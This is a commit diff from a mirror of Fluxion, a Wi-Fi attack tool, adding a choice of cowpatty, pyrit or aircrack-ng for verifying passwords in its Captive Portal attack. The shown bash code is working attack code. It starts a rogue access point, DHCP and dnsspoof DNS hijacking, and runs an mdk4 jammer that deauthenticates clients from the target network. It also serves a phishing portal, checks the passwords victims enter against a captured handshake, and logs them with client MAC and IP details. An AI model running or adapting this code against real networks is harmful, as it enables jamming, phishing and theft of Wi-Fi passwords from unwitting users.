Mirrors
/
fluxion
mirror of https://github.com/FluxionNetwork/fluxion.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added discrete options to authenticator. 

The authenticator may now be directed to use one of cowpatty, pyrit, or aircrack-ng, for password verification.
This commit is contained in:
Matias Barcenas 2020-04-26 02:46:05 -05:00
parent 0590dc0b63
commit 597275372b
2 changed files with 90 additions and 82 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

169
attacks/Captive Portal/attack.sh
View File

@ -8,11 +8,6 @@ CaptivePortalState="Not Ready"
CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog"
CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog"
CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant")
CaptivePortalAuthenticationMethodsInfo=(
"(handshake file, ${CGrn}recommended$CClr)"
) # "(Target AP authentication, slow)")
# ============= < Virtual Network Configuration > ============ # # ============= < Virtual Network Configuration > ============ #
# To avoid collapsing with an already existing network, # To avoid collapsing with an already existing network,
# we'll use a somewhat uncommon network and server IP. # we'll use a somewhat uncommon network and server IP.
@ -205,7 +200,7 @@ captive_portal_unset_authenticator() {
if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi
case "$CaptivePortalAuthenticatorMode" in case "$CaptivePortalAuthenticatorMode" in
"hash") "hash"*)
echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;; echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;;
esac esac
@ -214,15 +209,15 @@ captive_portal_unset_authenticator() {
# If we've only got one option, then the user skipped this section # If we've only got one option, then the user skipped this section
# by auto-selecting that single option, so we unset the previous # by auto-selecting that single option, so we unset the previous
# phase along with this one to properly take the user back. # phase along with this one to properly take the user back.
if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then #if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
return 1 # Trigger undo chain because it was auto-selected. # return 1 # Trigger undo chain because it was auto-selected.
fi #fi
} }
captive_portal_set_authenticator() { captive_portal_set_authenticator() {
if [ "$CaptivePortalAuthenticatorMode" ]; then if [ "$CaptivePortalAuthenticatorMode" ]; then
case "$CaptivePortalAuthenticatorMode" in case "$CaptivePortalAuthenticatorMode" in
"hash") "hash"*)
if [ "$CaptivePortalHashPath" ]; then if [ "$CaptivePortalHashPath" ]; then
echo "Captive Portal authentication mode is already set, skipping!" \ echo "Captive Portal authentication mode is already set, skipping!" \
> $FLUXIONOutputDevice > $FLUXIONOutputDevice
@ -234,46 +229,47 @@ captive_portal_set_authenticator() {
captive_portal_unset_authenticator captive_portal_unset_authenticator
# If we've got only one choice, auto-select it for the user. # # If we've got only one choice, auto-select it for the user.
if [ \ #if [ \
${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ # ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \ # ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
"$FLUXIONAuto" ]; then # "$FLUXIONAuto" ]; then
CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}" # CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \ # echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
> $FLUXIONOutputDevice # > $FLUXIONOutputDevice
else #else
fluxion_header fluxion_header
echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
echo echo
fluxion_target_show fluxion_target_show
local choices=( local choices=(
"${CaptivePortalAuthenticationMethods[@]}" "$CaptivePortalVerificationMethodPyritOption"
"$FLUXIONGeneralBackOption" "$CaptivePortalVerificationMethodCowpattyOption"
) "$CaptivePortalVerificationMethodAircrackNG"
io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \ "$FLUXIONGeneralBackOption"
choices[@] CaptivePortalAuthenticationMethodsInfo[@] )
io_query_choice "" choices[@]
echo echo
CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}" CaptivePortalAuthenticatorMode="${IOQueryChoice}"
# If we're going back, reset everything and abort. # If we're going back, reset everything and abort.
if [[ \ if [[ \
"$CaptivePortalAuthenticatorMode" == \ "$CaptivePortalAuthenticatorMode" == \
"$FLUXIONGeneralBackOption" ]]; then "$FLUXIONGeneralBackOption" ]]; then
captive_portal_unset_authenticator captive_portal_unset_authenticator
return -1 return -1
fi
fi fi
#fi
# Process the authentication method selected. # Process the authentication method selected.
local result=1 # Assume failure at first. local result=1 # Assume failure at first.
case "$CaptivePortalAuthenticatorMode" in case "$CaptivePortalAuthenticatorMode" in
"hash") "hash"*)
# Pass default path if no path is set yet. # Pass default path if no path is set yet.
if [ ! "$CaptivePortalHashPath" ]; then if [ ! "$CaptivePortalHashPath" ]; then
CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap"
@ -848,38 +844,34 @@ while [ \$AuthenticatorState = \"running\" ]; do
" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
# 05/26/19: Default to cowpatty for verification since aircrack-ng appears to have a bug. case "$CaptivePortalAuthenticatorMode" in
if which cowpatty &> /dev/null; then # Cowpatty
echo " "$CaptivePortalVerificationMethodCowpattyOption")
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then local -r verifiedCondition="cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> $FLUXIONOutputDevice"
if cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> /dev/null; then ;;
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" # Pyrit
"$CaptivePortalVerificationMethodPyritOption")
local -r verifiedCondition="pyrit -r \"$CaptivePortalHashPath\" -i \"$FLUXIONWorkspacePath/candidate.txt\" -b $FluxionTargetMAC attack_passthrough &> $FLUXIONOutputDevice"
;;
sleep 1 *)
break # Aircrack-ng
# Check if we've got the correct password by looking for
else # anything other than \"Passphrase not in\" or \"KEY NOT FOUND\".
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" local -r verifiedCondition="aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\""
;;
fi esac
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" echo "
else if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
echo " if $verifiedCondition; then
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
# Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\". sleep 1
if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then break
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" else
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
sleep 1 fi
break fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
else
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
fi
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
fi
fi fi
local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
@ -922,7 +914,7 @@ while [ \$AuthenticatorState = \"running\" ]; do
echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
echo " echo "
sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
fi fi
@ -953,7 +945,7 @@ Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand))
IP: $(captive_portal_get_client_IP) IP: $(captive_portal_get_client_IP)
\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" \" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
# echo " # echo "
# aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ # aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\
#" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" #" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
@ -1345,41 +1337,43 @@ save_attack() {
stop_attack() { stop_attack() {
# Attempt to find PIDs of any running authenticators. # Attempt to find PIDs of any running authenticators.
local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}') #local authenticatorPID=$(pgrep
#local authenticatorPID=$( \
# ps a | grep -vE "xterm|grep" | \
# grep captive_portal_authenticator.sh | awk '{print $1}' \
#)
# Signal any authenticator to stop authentication loop. # Signal any authenticator to stop authentication loop.
if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi fluxion_kill_lineage "--signal SIGABRT" \
"xterm.+captive_portal_authenticator\\.sh"
if [ "$CaptivePortalJammerServiceXtermPID" ]; then if [ "$CaptivePortalJammerServiceXtermPID" ]; then
kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \ fluxion_kill_lineage $CaptivePortalJammerServiceXtermPID
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
CaptivePortalJammerServiceXtermPID="" # Clear parent PID CaptivePortalJammerServiceXtermPID="" # Clear parent PID
fi fi
sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk4_blacklist.lst" sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk4_blacklist.lst"
# Kill captive portal web server log viewer. # Kill captive portal web server log viewer.
if [ "$CaptivePortalWebServiceXtermPID" ]; then if [ "$CaptivePortalWebServiceXtermPID" ]; then
kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice fluxion_kill_lineage $CaptivePortalWebServiceXtermPID
CaptivePortalWebServiceXtermPID="" # Clear service PID CaptivePortalWebServiceXtermPID="" # Clear service PID
fi fi
# Kill captive portal web server. # Kill captive portal web server.
if [ "$CaptivePortalWebServicePID" ]; then if [ "$CaptivePortalWebServicePID" ]; then
kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice fluxion_kill_lineage $CaptivePortalWebServicePID
CaptivePortalWebServicePID="" # Clear service PID CaptivePortalWebServicePID="" # Clear service PID
fi fi
# Kill DNS service if one is found. # Kill DNS service if one is found.
if [ "$CaptivePortalDNSServiceXtermPID" ]; then if [ "$CaptivePortalDNSServiceXtermPID" ]; then
kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ fluxion_kill_lineage $CaptivePortalDNSServiceXtermPID
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
CaptivePortalDNSServiceXtermPID="" # Clear parent PID CaptivePortalDNSServiceXtermPID="" # Clear parent PID
fi fi
# Kill DHCP service. # Kill DHCP service.
if [ "$CaptivePortalDHCPServiceXtermPID" ]; then if [ "$CaptivePortalDHCPServiceXtermPID" ]; then
kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \ fluxion_kill_lineage $CaptivePortalDHCPServiceXtermPID
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
CaptivePortalDHCPServiceXtermPID="" # Clear parent PID CaptivePortalDHCPServiceXtermPID="" # Clear parent PID
fi fi
sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt" sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt"
@ -1432,6 +1426,8 @@ start_attack() {
"dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" &
# Save parent's pid, to get to child later. # Save parent's pid, to get to child later.
CaptivePortalDHCPServiceXtermPID=$! CaptivePortalDHCPServiceXtermPID=$!
echo "DHCP Service: $CaptivePortalDHCPServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice"
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \
@ -1439,6 +1435,8 @@ start_attack() {
"dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" & "dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" &
# Save parent's pid, to get to child later. # Save parent's pid, to get to child later.
CaptivePortalDNSServiceXtermPID=$! CaptivePortalDNSServiceXtermPID=$!
echo "DNS Service: $CaptivePortalDNSServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice" echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice"
lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \ lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \
@ -1449,6 +1447,8 @@ start_attack() {
-title "FLUXION Web Service" -e \ -title "FLUXION Web Service" -e \
"tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" &
CaptivePortalWebServiceXtermPID=$! CaptivePortalWebServiceXtermPID=$!
echo "Web Service: $CaptivePortalWebServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice" echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice"
echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk4_blacklist.lst" echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk4_blacklist.lst"
@ -1482,12 +1482,17 @@ start_attack() {
# Save parent's pid, to get to child later. # Save parent's pid, to get to child later.
CaptivePortalJammerServiceXtermPID=$! CaptivePortalJammerServiceXtermPID=$!
fi fi
echo "Jammer Service: $CaptivePortalJammerServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"
xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \ xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \
-title "FLUXION AP Authenticator" \ -title "FLUXION AP Authenticator" \
-e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" &
local -r authService=$!
echo "Auth Service: $authService"
>> $FLUXIONOutputDevice
} }
# FLUXSCRIPT END # FLUXSCRIPT END

3
attacks/Captive Portal/language/en.sh
View File

@ -19,6 +19,9 @@ CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr
CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)"
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
CaptivePortalVerificationMethodQuery="Select a password verification method" CaptivePortalVerificationMethodQuery="Select a password verification method"
CaptivePortalVerificationMethodPyritOption="hash - pyrit"
CaptivePortalVerificationMethodCowpattyOption="hash - cowpatty"
CaptivePortalVerificationMethodAircrackNG="hash - aircrack-ng (default, ${CYel}unreliable${CClr})"
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal." CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal."
CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate" CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"